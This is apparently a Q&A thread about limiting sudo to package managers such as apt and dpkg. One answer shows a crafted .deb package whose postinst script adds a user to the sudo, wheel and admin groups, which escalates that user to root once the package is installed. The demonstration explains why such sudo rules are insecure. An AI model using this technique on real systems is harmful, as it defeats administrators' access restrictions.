# How to limit sudo for user only for rpm/deb

Tags: linux, ubuntu, shell, sudo, deb

Is there anyway to limit sudo for user, in order to only for invocation of rpm/deb to install packages?

Answer (score 1, accepted):

To give `bill` the ability to run `apt-get`, simply add this to `/etc/sudoers`:

```
bill          ALL = /usr/bin/apt-get
```

To give `john` or `bob` the ability to run any of several commands, we could create some more scalable groups for them:

```
User_Alias    INSTALLERS = john, bob

Cmnd_Alias    INSTALL = /usr/bin/dpkg, \
                        /usr/bin/apt, \
                        /usr/bin/yum, \
                        /usr/bin/dnf

INSTALLERS    ALL = INSTALL
```

I like the idea (in principle) because it's nice to let your users install packages from trusted sources without giving them full root permissons.  Give them access to `apt` without giving them write access to `/etc/apt/sources.list{,.d}`.  What could go wrong?

However, below I will demonstrate how easily that can be abused.

```
$ mkdir -p elevator_1.0/DEBIAN
$ cat > elevator_1.0/DEBIAN/control <<EOF
Package: elevator
Version: 1.0
Architecture: all
Maintainer: Anonymous <anon@debian.org>
Description: Malicious permission elevator
 Installing this package will elevate permissions of a user.
 Uninstalling will not undo this
EOF
$ cat > eleavtor_1.0/DEBIAN/postinst <<EOF
#!/bin/bash
usermod -a -G sudo bob
usermod -a -G wheel bob
usermod -a -G admin bob
echo "bob has been elevated!"
EOF
$ dpkg-deb -b elevator_1.0
dpkg-deb: building package 'elevator' in 'elevator_1.0.deb'.

$ sudo apt install ./elevator_1.0.deb 
...
The following NEW packages will be installed:
  elevator
...
Preparing to unpack .../elevator_1.0.deb ...
Unpacking elevator (1.0) ...
Setting up elevator (1.0) ...
bob has been elevated
```

If there is a more secure approach, I would certainly be interested.  I give my employees root access, only because they need to be able to install software from the official debian archive and our company's internal archive.  I have told them not to add untrusted sources, but I have no way to enforce that.

Answer (score 2):

> Is there anyway to limit sudo for user, in order to only for invocation of rpm/deb to install packages?

Yes; `man sudoers` explains in detail and with examples how to do that.

But it would be senseless to do that: allow me to install any rpm, and you've given me root rights. A package can contain arbitrary setup scripts that do what I want and get run as root, or they could simply contain a program that does the same as sudo but doesn't restrict me.

(same for `deb` or any other pakage manager, or really, for any program that allows execution of code)